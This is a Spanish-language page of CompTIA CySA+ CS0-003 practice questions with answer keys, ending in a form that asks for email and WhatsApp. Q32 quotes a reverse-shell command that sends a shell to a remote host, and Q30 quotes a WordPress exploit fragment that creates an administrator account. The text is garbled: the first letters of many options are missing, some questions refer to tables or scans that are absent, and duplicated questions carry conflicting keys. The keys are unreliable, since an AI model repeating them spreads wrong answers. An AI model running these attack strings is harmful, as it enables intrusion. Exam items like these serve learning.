¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Éxito en el examen CompTIA CySA+ con las pruebas de práctica CS0-003

La certificación CySA+ está diseñada para profesionales de la ciberseguridad responsables de la detección, prevención y respuesta ante incidentes mediante la supervisión continua de la seguridad. Nuestras preguntas de examen cubren una amplia gama de temas cruciales para la certificación CySA+, como la detección de amenazas, el análisis de datos, la gestión de vulnerabilidades, etc. Proporcionamos valiosos recursos de preparación para el examen, como materiales de estudio y guías de examen. Estos recursos están cuidadosamente diseñados para ayudarle a profundizar en su comprensión de los conceptos clave y mejorar su preparación para el examen. Para mejorar aún más su preparación, utilice nuestros simulacros de examen. Estas pruebas de práctica reproducen el entorno del examen, permitiéndole evaluar sus conocimientos y habilidades antes del examen real. Con nuestro apoyo, aprobar el examen CompTIA Cybersecurity Analyst (CySA+) CS0-003 y obtener su certificación está a su alcance.
Realizar otros exámenes en línea

Cuestionar #1
El equipo de seguridad revisa un servidor web en busca de XSS y ejecuta la siguiente exploración de Nmap:¿Cuál de las siguientes opciones describe con mayor precisión el resultado de la exploración?
A. na salida de caracteres > y " como los parámetros utilizados m el intento
B. l parámetro vulnerable ID http://172
C. l parámetro vulnerable y los caracteres no filtrados o codificados pasados > y " como inseguros
D. l parámetro vulnerable y los caracteres > y " con un intento de XSS reflejado
Ver respuesta
Respuesta correcta: D
Cuestionar #2
Una empresa está en proceso de implementar un programa de gestión de vulnerabilidades, y existen preocupaciones acerca de conceder al equipo de seguridad acceso a datos sensibles. Cuál de los siguientes métodos de escaneo puede ser implementado para reducir el acceso a los sistemas mientras que proporciona los resultados de escaneo de vulnerabilidad más precisos?
A. xploración de la red con credenciales
B. xploración pasiva
C. xploración basada en agentes
D. Exploración dinámica
Ver respuesta
Respuesta correcta: C
Cuestionar #3
Un equipo de respuesta a incidentes recibe una alerta para iniciar una investigación sobre una interrupción de Internet. La interrupción impide que todos los usuarios de varias ubicaciones accedan a recursos SaaS externos. El equipo determina que la organización fue afectada por un ataque DDoS. ¿Cuál de los siguientes registros debe revisar primero el equipo?
A. DN
B. scáner de vulnerabilidades
C. NS
D. Servidor web
Ver respuesta
Respuesta correcta: C
Cuestionar #4
Una empresa que tiene una plantilla geográficamente diversa e IPs dinámicas quiere implementar un método de escaneo de vulnerabilidades con un tráfico de red reducido. Cuál de las siguientes opciones cumpliría mejor este requisito?
A. xterior
B. Basado en agentes
C. in acreditación
D. creditado
Ver respuesta
Respuesta correcta: B
Cuestionar #5
Una empresa está implementando un programa de gestión de vulnerabilidades y pasando de un entorno local a un entorno híbrido de nube IaaS. Cuál de las siguientes implicaciones debe tenerse en cuenta en el nuevo entorno híbrido?
A. os escáneres actuales deben migrar a la nube
B. Es posible que los escáneres actuales no detecten las desconfiguraciones específicas de la nube
C. Los escáneres de vulnerabilidades existentes no pueden escanear sistemas IaaS
D. as exploraciones de vulnerabilidades en entornos de nube deben realizarse desde la nube
Ver respuesta
Respuesta correcta: B
Cuestionar #6
Un equipo de seguridad lleva a cabo una reunión de lecciones aprendidas después de luchar para determinar quién debe llevar a cabo los siguientes pasos después de un evento de seguridad. Cuál de las siguientes medidas debería adoptar el equipo para resolver este problema?
A. Acuerdo de nivel de servicio
B. lan de gestión de cambios
C. lan de respuesta a incidentes
D. Memorándum de acuerdo
Ver respuesta
Respuesta correcta: C
Cuestionar #7
Un equipo de respuesta a incidentes encontró IoCs en un servidor crítico. El equipo necesita aislar y recopilar pruebas técnicas para una investigación posterior. Cuál de los siguientes datos se debe recopilar primero para preservar la información confidencial antes de aislar el servidor?
A. isco duro
B. artición primaria de arranque
C. rchivos maliciosos
D. Tabla de enrutamiento
E. irección IP estática
Ver respuesta
Respuesta correcta: D
Cuestionar #8
Un servidor web virtual de un grupo de servidores se infectó con malware después de que un analista utilizara Internet para investigar un problema del sistema. Una vez reconstruido el servidor y añadido de nuevo al grupo de servidores, los usuarios informaron de problemas con el sitio web, lo que indicaba que no se podía confiar en el sitio. ¿Cuál de las siguientes es la causa más probable del problema del servidor?
A. l servidor fue configurado para utilizar SSL para transmitir datos de forma segurA
B. El servidor soportaba protocolos TLS débiles para las conexiones de los clientes
C. El malware infectó todos los servidores web del grupo
D. l certificado digital del servidor web era autofirmado
Ver respuesta
Respuesta correcta: D
Cuestionar #9
Se ha publicado una vulnerabilidad de inyección de comandos de día cero. Un administrador de seguridad está analizando los siguientes registros en busca de pruebas de adversarios que intenten explotar la vulnerabilidad:¿Cuál de las siguientes entradas de registro proporciona pruebas del intento de explotación?
A. ntrada 1
B. ntrada 2
C. egistro 3
D. ntrada de registro 4
Ver respuesta
Respuesta correcta: A
Cuestionar #10
Un jefe de equipo de ciberseguridad está desarrollando métricas para presentarlas en los informes semanales a los ejecutivos. Los ejecutivos están interesados en saber cuánto tiempo se tarda en detener la propagación de malware que entra en la red. ¿Cuál de las siguientes métricas debería incluir el jefe de equipo en los informes?
A. iempo medio entre fallos
B. iempo medio de detección
C. Tiempo medio de reparación
D. iempo medio de contención
Ver respuesta
Respuesta correcta: D
Cuestionar #11
Un analista de ciberseguridad observa una actividad inusual de exploración de la red procedente de un país con el que la empresa no hace negocios. Cuál de las siguientes es la mejor técnica de mitigación?
A. eobloquear el país de origen infractor
B. loquear el rango IP de los escaneos en el firewall de la red
C. ealice un análisis de tendencias históricas y busque actividades de exploración similares
D. Bloquear la dirección IP específica de los escaneos en el cortafuegos de la red
Ver respuesta
Respuesta correcta: B
Cuestionar #12
¿Cuál de las siguientes fases de la Cyber Kill Chain implica que el adversario intente establecer comunicación con un objetivo explotado con éxito?
A. Mando y control
B. cciones sobre los objetivos
C. Explotación
D. Entrega
Ver respuesta
Respuesta correcta: A
Cuestionar #13
Un equipo de respuesta a incidentes ha terminado de responder a un incidente de seguridad importante. El equipo de gestión ha pedido al analista jefe que proporcione un informe posterior a la acción que incluya las lecciones aprendidas. ¿Cuál de las siguientes es la razón más probable para incluir las lecciones aprendidas?
A. Cumplir los requisitos reglamentarios de notificación de incidentes
B. Responsabilizar a otros departamentos
C. dentificar áreas de mejora en el proceso de respuesta a incidentes
D. estacar las prácticas notables del equipo de respuesta a incidentes de la organización
Ver respuesta
Respuesta correcta: C
Cuestionar #14
El Director General de una organización ha oído recientemente que la explotación de nuevos ataques en el sector se producía aproximadamente 45 días después de la publicación de un parche. Cuál de las siguientes opciones protegería mejor a esta organización?
A. Tiempo medio de reparación de 30 días
B. Un tiempo medio de detección de 45 días
C. Un plazo medio de respuesta de 15 días
D. Pruebas de aplicaciones de terceros
Ver respuesta
Respuesta correcta: A
Cuestionar #15
El mismo viernes por la tarde se publicaron parches para dos vulnerabilidades muy explotadas. En las tablas siguientes se muestra información sobre los sistemas y las vulnerabilidades:¿Cuál de los siguientes puntos debería priorizar el analista de seguridad para su corrección?
A. ogers
B. rady
C. rees
D. anning
Ver respuesta
Respuesta correcta: B
Cuestionar #16
Mientras revisa los registros del servidor web, un analista observa varias entradas con las mismas marcas de tiempo, pero todas contienen caracteres extraños en la línea de solicitud. ¿Cuál de los siguientes pasos debe seguirse?
A. paga la red inmediatamente y llama a la siguiente persona en la cadena de mando
B. etermine de qué ataque son indicativos los caracteres impares
C. tilizar el marco de ataque correcto y determinar en qué consistirá la respuesta al incidente
D. otificar a las fuerzas de seguridad locales para que respondan al incidente
Ver respuesta
Respuesta correcta: B
Cuestionar #17
Durante un incidente, un analista necesita adquirir pruebas para su posterior investigación. ¿Cuál de los siguientes elementos debe recogerse primero en un sistema informático, en relación con su nivel de volatilidad?
A. ontenido del disco
B. opia de seguridad de datos
C. rchivos temporales
D. Procesos en ejecución
Ver respuesta
Respuesta correcta: D
Cuestionar #18
Un analista de seguridad está escribiendo un script de shell para identificar direcciones IP del mismo país. Cuál de las siguientes funciones ayudaría al analista a lograr el objetivo?
A. unction w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }
B. unction x() { info=$(geoiplookup $1) && echo "$1 | $info" }
C. unction y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }
D. unction z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Ver respuesta
Respuesta correcta: B
Cuestionar #19
El Director General de una organización ha oído recientemente que la explotación de nuevos ataques en el sector se producía aproximadamente 45 días después de la publicación de un parche. Cuál de las siguientes opciones protegería mejor a esta organización?
A. Tiempo medio de reparación de 30 días
B. Un tiempo medio de detección de 45 días
C. Un plazo medio de respuesta de 15 días
D. Pruebas de aplicaciones de terceros
Ver respuesta
Respuesta correcta: C
Cuestionar #20
Un CVE antiguo con una puntuación de vulnerabilidad de 7,1 se elevó a una puntuación de 9,8 debido a un exploit ampliamente disponible que se utiliza para entregar ransomware. Cuál de los siguientes factores comunicaría con mayor probabilidad un analista como motivo de esta escalada?
A. mbito de aplicación
B. rmatización
C. VSS
D. alor de los activos
Ver respuesta
Respuesta correcta: B
Cuestionar #21
Un empleado accedió a un sitio web que infectó un dispositivo con malware invasivo. El analista de respuesta a incidentes ha:? creado el registro de pruebas inicial.? desactivado el adaptador inalámbrico del dispositivo.? entrevistado al empleado, que no pudo identificar el sitio Web al que se accedió.? revisado los registros de tráfico del proxy Web
A. Actualizar el firmware del sistema y reimaginar el hardware
B. Instalar un escáner de malware adicional que envíe alertas por correo electrónico al analistA
C. Configurar el sistema para que utilice un servidor proxy para el acceso a Internet
D. Eliminar el perfil de usuario y restaurar los datos desde la copia de seguridad
Ver respuesta
Respuesta correcta: A
Cuestionar #22
Un analista de seguridad necesita asegurarse de que los sistemas de toda la organización están protegidos en función de la sensibilidad del contenido que aloja cada sistema. El analista está trabajando con los respectivos propietarios de los sistemas para ayudar a determinar la mejor metodología que busca promover la confidencialidad, disponibilidad e integridad de los datos alojados. ¿Cuál de las siguientes acciones debería realizar primero el analista de seguridad para categorizar y priorizar los respectivos sistemas?
A. ntrevistar a los usuarios que acceden a estos sistemas
B. scanear los sistemas para ver qué vulnerabilidades existen actualmente
C. onfigurar alertas para exploits de día cero específicos del proveedor
D. eterminar el valor de los activos de cada sistemA
Ver respuesta
Respuesta correcta: D
Cuestionar #23
Las cuentas de usuario de una empresa se han visto comprometidas. Los usuarios también están informando de que el portal interno de la empresa a veces sólo es accesible a través de HTTP, otras veces; es accesible a través de HTTPS. ¿Cuál de las siguientes opciones describe con mayor probabilidad la actividad observada?
A. Hay un problema con el certificado SSL que provoca que el puerto 443 no esté disponible para el acceso HTTPS
B. n ataque on-path está siendo realizado por alguien con acceso interno que fuerza a los usuarios al puerto 80
C. El servidor web no puede gestionar una cantidad creciente de peticiones HTTPS, por lo que reenvía a los usuarios al puerto 80
D. Se ha producido un error en BGP debido a las nuevas reglas aplicadas en los routers internos de la empresa
Ver respuesta
Respuesta correcta: B
Cuestionar #24
Durante unas vacaciones prolongadas, una empresa sufrió un incidente de seguridad. Esta información se transmitió correctamente al personal adecuado en el momento oportuno y el servidor estaba actualizado y configurado con la auditoría y el registro adecuados. El Director de Seguridad de la Información quiere averiguar con precisión qué ocurrió. ¿Cuál de las siguientes acciones debería tomar primero el analista?
A. lonar el servidor virtual para análisis forense
B. og m al servidor afectado y comenzar el análisis de los logs
C. estaurar desde la última copia de seguridad buena conocida para confirmar que no ha habido pérdida de conectividad
D. pagar inmediatamente el servidor afectado
Ver respuesta
Respuesta correcta: A
Cuestionar #25
Un equipo de la nube recibió una alerta de que se estaban autoaprovisionando recursos no autorizados. Después de investigar, el equipo sospecha que se está produciendo minería de criptomonedas. Cuál de los siguientes indicadores llevaría más probablemente al equipo a esta conclusión?
A. Alta utilización de la GPU
B. Consumo de ancho de banda
C. Cambios no autorizados
D. Picos de tráfico inusuales
Ver respuesta
Respuesta correcta: A
Cuestionar #26
¿Cuál de las siguientes opciones utilizaría con mayor probabilidad un analista de seguridad para comparar las TTP de diferentes adversarios conocidos de una organización?
A. ITRE ATT&CK
B. iber Kill Cham
C. WASP
D. TIX/TAXII
Ver respuesta
Respuesta correcta: A
Cuestionar #27
Los nuevos empleados de una organización han estado conectando constantemente cámaras web personales a pesar de que la política de la empresa prohíbe el uso de dispositivos personales. El gerente de SOC descubre que los nuevos empleados no son conscientes de la política de la empresa. ¿Cuál de las siguientes opciones recomendaría con mayor probabilidad el responsable de SOC para ayudar a garantizar que los nuevos empleados sean responsables de seguir la política de la empresa?
A. Recursos Humanos debe enviar por correo electrónico una copia del acuerdo de usuario a todos los nuevos empleados
B. os supervisores deben obtener una confirmación verbal de los nuevos empleados indicando que han leído el acuerdo de usuario
C. Todos los nuevos empleados deben realizar una prueba sobre la política de seguridad de la empresa durante el proceso de incorporación
D. Todos los nuevos empleados deben firmar un acuerdo de usuario para reconocer la política de seguridad de la empresa
Ver respuesta
Respuesta correcta: D
Cuestionar #28
Un analista de seguridad está intentando identificar posibles direcciones de red de diferentes redes de origen pertenecientes a la misma empresa y región. ¿Cuál de las siguientes funciones de shell script podría ayudar a lograr el objetivo?
A. unction w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. unction x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. unction y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. unction z() { c=$(geoiplookup$1) && echo "$1 | $c" }
Ver respuesta
Respuesta correcta: C
Cuestionar #29
Un técnico identifica una vulnerabilidad en un servidor y aplica un parche de software. Cuál de los siguientes debería ser el siguiente paso en el proceso de corrección?
A. Pruebas
B. plicación
C. alidación
D. Retroceso
Ver respuesta
Respuesta correcta: C
Cuestionar #30
Un analista ha recibido una notificación de evento IPS del SIEM indicando que una dirección IP, que se sabe que es maliciosa, ha intentado explotar una vulnerabilidad de día cero en varios servidores web. El exploit contenía el siguiente fragmento:/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator¿Cuál de los siguientes controles funcionaría mejor para mitigar el ataque representado por este fragmento?
A. Limitar la creación de usuarios sólo a los administradores
B. Limitar la creación de diseños sólo a los administradores
C. Establezca el directorio trx_addons como de sólo lectura para todos los usuarios
D. Ponga el directorio V2 en solo lectura para todos los usuarios
Ver respuesta
Respuesta correcta: A
Cuestionar #31
¿Cuál de las siguientes es la mejor métrica en la que debe centrarse una organización dadas las recientes inversiones en SIEM, SOAR y un sistema de tickets?
A. iempo medio de detección
B. úmero de exploits por táctica
C. olumen de alerta
D. antidad de intentos de intrusión
Ver respuesta
Respuesta correcta: A
Cuestionar #32
Un analista de seguridad detecta un intento de exploit que contiene el siguiente comando:sh -i >& /dev/udp/10.1.1.1/4821 0>$l¿Cuál de los siguientes se está intentando?
A. CE
B. everse shell
C. SS
D. Inyección SQL
Ver respuesta
Respuesta correcta: B
Cuestionar #33
Un analista de seguridad está llevando a cabo una investigación relacionada con varios binarios de malware para Windows. El analista quiere recopilar inteligencia sin revelar información a los atacantes. ¿Cuál de las siguientes acciones permitiría al analista lograr el objetivo?
A. ube el binario a una caja de arena para su análisis
B. nviar los binarios al proveedor de antivirus
C. jecutar los binarios en un entorno con conectividad a Internet
D. Consultar los hashes de los archivos mediante VirusTotal
Ver respuesta
Respuesta correcta: A
Cuestionar #34
Un analista de seguridad está intentando identificar posibles direcciones de red de diferentes redes de origen pertenecientes a la misma empresa y región. ¿Cuál de las siguientes funciones de shell script podría ayudar a lograr el objetivo?
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
Ver respuesta
Respuesta correcta: C
Cuestionar #35
¿Cuál de las siguientes opciones contribuiría a minimizar la intervención humana y a mejorar los procesos en las operaciones de seguridad?
A. SSTMM
B. IEM
C. OAR
D. WASP
Ver respuesta
Respuesta correcta: C
Cuestionar #36
Un analista se da cuenta de que hay un dispositivo interno enviando tráfico HTTPS con caracteres adicionales en la cabecera a una IP maliciosa conocida en otro país. Cuál de las siguientes opciones describe lo que ha observado el analista?
A. Balizamiento
B. Secuencias de comandos en sitios cruzados
C. esbordamiento del búfer
D. HP transversal
Ver respuesta
Respuesta correcta: A
Cuestionar #37
Un analista de seguridad obtuvo la siguiente tabla de resultados de una reciente evaluación de vulnerabilidades que se llevó a cabo contra un único servidor web en el entorno:¿Cuál de las siguientes acciones debe completarse primero para remediar los hallazgos?
A. edir al equipo de desarrollo web que actualice el contenido de la página
B. ñadir la dirección IP permitir el listado para el acceso al panel de control
C. dquirir un certificado apropiado de una CA raíz de confianza
D. ealizar una desinfección adecuada en todos los campos
Ver respuesta
Respuesta correcta: D
Cuestionar #38
Durante un escaneo de seguridad, un analista de seguridad encuentra regularmente las mismas vulnerabilidades en una aplicación crítica. Cuál de las siguientes recomendaciones mitigaría mejor este problema si se aplicara a lo largo de la fase SDLC?
A. Sistemas patentados
B. Sistemas heredados
C. istemas operativos no compatibles
D. alta de ventanas de mantenimiento
Ver respuesta
Respuesta correcta: C
Cuestionar #39
Al iniciar una investigación, ¿cuál de los siguientes pasos debe darse en primer lugar?
A. otificar a las fuerzas del orden
B. segurar la escena
C. ncautar todas las pruebas relacionadas
D. ntrevistar a los testigos
Ver respuesta
Respuesta correcta: B
Cuestionar #40
¿Cuáles de las siguientes tareas de operaciones de seguridad son ideales para la automatización?
A. nálisis de archivos sospechosos:Busque gráficos de aspecto sospechoso en una carpetA
B. cciones de bloqueo de IoC en el cortafuegos:Examine los registros del cortafuegos en busca de IoC del exploit de día cero publicado más recientementeTome medidas de mitigación en el cortafuegos para bloquear el comportamiento encontrado en los registrosRealice un seguimiento de los falsos positivos causados por las reglas de bloqueo
C. rrores de usuario de la aplicación de seguridad:Busque en los registros de errores señales de usuarios que tengan problemas con la aplicación de seguridadBusque el número de teléfono del usuarioLlame al usuario para ayudarle con cualquier pregunta sobre el uso de la aplicación
D. nálisis del encabezado del correo electrónico:Comprobar si el encabezado del correo electrónico tiene una métrica de confianza de phishing mayor o igual a cincoAñadir el dominio del remitente a la lista de bloqueadosMover el correo electrónico a cuarentena
Ver respuesta
Respuesta correcta: D
Cuestionar #41
Un analista de seguridad está revisando una captura de paquetes en Wireshark que contiene una sesión FTP de una máquina potencialmente comprometida. El analista establece el siguiente filtro de visualización: ftp. El analista puede ver que hay varias solicitudes RETR con respuestas 226 Transferencia completa, pero el panel de lista de paquetes no muestra los paquetes que contienen la transferencia de archivos propiamente dicha. ¿Cuál de las siguientes acciones puede realizar el analista para ver el contenido completo de los archivos descargados?
A. ambia el filtro de visualización a ftp
B. ambiar el filtro de visualización a tcp
C. ambia el filtro de visualización a ftp-data y sigue los flujos TCP
D. Vaya al menú Archivo y seleccione FTP en la opción Exportar objetos
Ver respuesta
Respuesta correcta: C
Cuestionar #42
Una organización llevó a cabo una evaluación de la vulnerabilidad de la aplicación web contra el sitio web corporativo, y se observó el siguiente resultado:¿Cuál de las siguientes recomendaciones de ajuste debe compartir el analista de seguridad?
A. stablecer una bandera HttpOnly para forzar la comunicación por HTTPS
B. Bloquear las solicitudes sin cabecera X-Frame-Options
C. Configurar un encabezado Access-Control-Allow-Origin para dominios autorizados
D. esactivar el encabezado de compartición de recursos entre orígenes
Ver respuesta
Respuesta correcta: C
Cuestionar #43
Un analista de ciberseguridad observa una actividad inusual de exploración de la red procedente de un país con el que la empresa no hace negocios. Cuál de las siguientes es la mejor técnica de mitigación?
A. Geobloquee el país de origen infractor
B. Bloquear el rango IP de los escaneos en el cortafuegos de la red
C. Realice un análisis histórico de tendencias y busque actividades de exploración similares
D. Bloquear la dirección IP específica de los escaneos en el cortafuegos de la red
Ver respuesta
Respuesta correcta: B
Cuestionar #44
Un programa de seguridad consiguió mejorar en un 30% el MTTR integrando los controles de seguridad en un SIEM. El analista ya no tenía que pasar de una herramienta a otra. ¿Cuál de las siguientes opciones describe mejor lo que hizo el programa de seguridad?
A. Enriquecimiento de datos
B. Plano de control de seguridad
C. ombinación de alimentación de amenaza
D. Cristal único
Ver respuesta
Respuesta correcta: D
Cuestionar #45
¿Cuál de las siguientes herramientas funcionaría mejor para evitar la exposición de información de identificación personal fuera de una organización?
A. AM
B. DS
C. KI
D. LP
Ver respuesta
Respuesta correcta: D
Cuestionar #46
El equipo de seguridad de una empresa está actualizando una sección de la política de informes que se refiere al uso inapropiado de recursos (por ejemplo, un empleado que instala criptomineros en las estaciones de trabajo de la oficina). Además del equipo de seguridad, ¿a cuál de los siguientes grupos se debería plantear el problema en primer lugar para cumplir con las mejores prácticas del sector?
A. ervicio de asistencia
B. Fuerzas y cuerpos de seguridad
C. Servicio jurídico
D. Miembro del Consejo
Ver respuesta
Respuesta correcta: C
Cuestionar #47
Una empresa ha sufrido una violación de las transacciones de sus clientes. Según los términos de PCI DSS, ¿a cuál de los siguientes grupos debe informar la organización de la violación?
A. onsejo de Normas de Seguridad de la PCI
B. Fuerzas y cuerpos de seguridad locales
C. uerzas y cuerpos de seguridad federales
D. Emisor de la tarjeta
Ver respuesta
Respuesta correcta: D
Cuestionar #48
Un analista de seguridad se encarga de priorizar las vulnerabilidades para su corrección. A continuación se muestran las políticas de seguridad pertinentes de la empresa:Política de seguridad 1006: Gestión de vulnerabilidades1. La empresa utilizará la métrica CVSSv3.1 Base Score Metrics (Exploitability and Impact) para priorizar la corrección de las vulnerabilidades de seguridad.2. En situaciones en las que haya que elegir entre confidencialidad y disponibilidad, la empresa dará prioridad a la confidencialidad de los datos sobre la disponibilidad de los sistemas y datos.3. La Com
A. ombre: THOR
B. ombre: CAP
C. ombre: LOKI
D. ombre: THANOS
Ver respuesta
Respuesta correcta: B
Cuestionar #49
Un analista de seguridad obtuvo la siguiente tabla de resultados de una reciente evaluación de vulnerabilidades que se llevó a cabo contra un único servidor web en el entorno:¿Cuál de las siguientes acciones debe completarse primero para remediar los hallazgos?
A. Pida al equipo de desarrollo web que actualice el contenido de la página
B. Añadir la dirección IP permitir el listado para el acceso al panel de control
C. Adquirir un certificado adecuado de una CA raíz de confianza
D. Realice una desinfección adecuada en todos los campos
Ver respuesta
Respuesta correcta: C
Cuestionar #50
Un usuario descarga software que contiene malware en un ordenador que acaba infectando otros numerosos sistemas. ¿En cuál de las siguientes situaciones se ha convertido el usuario?
A. Hacktivista
B. Amenaza persistente avanzada
C. Amenaza interna
D. Guión infantil
Ver respuesta
Respuesta correcta: D
Cuestionar #51
Un analista de seguridad debe preservar un disco duro del sistema que se vio involucrado en una solicitud de litigio. Cuál de los siguientes es el mejor método para garantizar que los datos del dispositivo no se modifican?
A. enerar un valor hash y hacer una imagen de copia de seguridad
B. ifrar el dispositivo para garantizar la confidencialidad de los datos
C. roteger el dispositivo con una contraseña complejA
D. ealizar un volcado de memoria para recoger datos residuales
Ver respuesta
Respuesta correcta: A

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: